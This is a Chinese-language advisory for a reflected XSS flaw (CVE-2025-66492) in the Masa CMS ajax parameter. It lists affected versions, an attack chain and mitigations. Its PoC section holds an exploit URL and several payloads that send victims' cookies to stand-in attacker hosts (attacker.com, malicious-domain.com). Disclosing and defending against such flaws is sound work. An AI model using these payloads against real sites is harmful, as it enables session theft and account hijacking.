CVE-2025-66492: Masa CMS ajax参数XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-66492

漏洞类型

XSS跨站脚本攻击

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Masa CMS

漏洞概述

Masa CMS是一款开源的企业内容管理平台。该平台在多个历史版本中存在严重的跨站脚本（XSS）安全漏洞。漏洞根源在于应用程序直接将用户可控的ajax URL查询参数值未做任何安全处理就直接输出到HTML页面的<head>标签区域内。攻击者可以通过构造包含恶意JavaScript代码的ajax参数来触发此漏洞。当受害者访问包含恶意链接的页面时，攻击脚本将在受害者浏览器上下文中执行，可能导致敏感会话信息被窃取、用户凭据泄露、网页内容被篡改，甚至进一步传播恶意软件。由于该漏洞影响范围覆盖多个产品分支的多个版本，且利用条件相对简单，对使用该CMS系统的企业构成了较高的安全风险。建议受影响的用户尽快升级到官方发布的安全修复版本。

技术细节

该漏洞属于典型的反射型XSS（Reflected Cross-Site Scripting）漏洞。在Masa CMS的页面渲染逻辑中，系统从HTTP请求中获取ajax参数后，未对其进行适当的输入验证和输出编码，直接将该参数值插入到HTML文档的<head>部分。攻击者可以通过构造形如?ajax=<script>alert(document.cookie)</script>的恶意URL来触发漏洞。当用户点击或被诱导访问该恶意链接时，浏览器会解析并执行嵌入在URL中的JavaScript代码。由于<script>标签被直接插入到<head>区域，浏览器会将其作为有效脚本执行，导致攻击者可以获取用户的会话Cookie、劫持用户会话、执行任意客户端操作或重定向用户到钓鱼网站。此漏洞的利用不需要任何特殊权限，攻击者只需诱骗用户访问特制链接即可成功实施攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Masa CMS版本，确定是否在受影响版本范围内（7.2.8及以下、7.3.1-7.3.13、7.4.0-alpha.1-7.4.8、7.5.0-7.5.1）

STEP 2

步骤2: 构造恶意链接

攻击者构造包含XSS payload的URL，将恶意JavaScript代码编码到ajax查询参数中，如?ajax=<script>恶意代码</script>

STEP 3

步骤3: 社会工程攻击

通过钓鱼邮件、即时通讯、社交媒体等渠道诱导目标用户点击或访问构造好的恶意链接

STEP 4

步骤4: 触发漏洞

用户访问恶意链接后，服务器将未经sanitize的ajax参数值直接返回并嵌入到响应HTML的<head>区域

STEP 5

步骤5: 脚本执行

用户浏览器解析HTML响应时，执行嵌入在<head>中的恶意<script>标签，触发XSS攻击

STEP 6

步骤6: 窃取敏感信息

攻击者通过JavaScript代码获取用户Cookie、会话令牌等敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7: 会话劫持

攻击者利用窃取的会话凭证冒充合法用户进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-66492 PoC - Masa CMS XSS via ajax parameter -->
<!-- Attack URL -->
https://[target-host]/masacms/?ajax=%3Cscript%3Ealert(document.cookie)%3C/script%3E

<!-- More sophisticated PoC - Session Hijacking -->
<script>
  // Steal session cookie
  fetch('https://attacker-controlled-server/steal?c=' + encodeURIComponent(document.cookie));
</script>

<!-- PoC to demonstrate cookie theft and exfiltration -->
<script>
  var cookies = document.cookie;
  var img = new Image();
  img.src = 'https://malicious-domain.com/log?cookie=' + btoa(cookies);
</script>

<!-- Automated exploitation payload -->
<svg/onload=fetch('https://attacker.com/api/collect?data='+btoa(document.cookie))>

影响范围

Masa CMS 7.2.8及以下所有版本

Masa CMS 7.3.1 至 7.3.13

Masa CMS 7.4.0-alpha.1 至 7.4.8

Masa CMS 7.5.0 至 7.5.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）配置Web应用防火墙（WAF）规则（如ModSecurity），阻止包含常见XSS payload特征的ajax查询参数请求；2）部署服务器端中间件，在请求到达应用层之前对ajax参数进行安全过滤，去除或转义危险字符；3）启用浏览器的XSS过滤器功能；4）限制用户可访问的功能范围，减少潜在攻击面。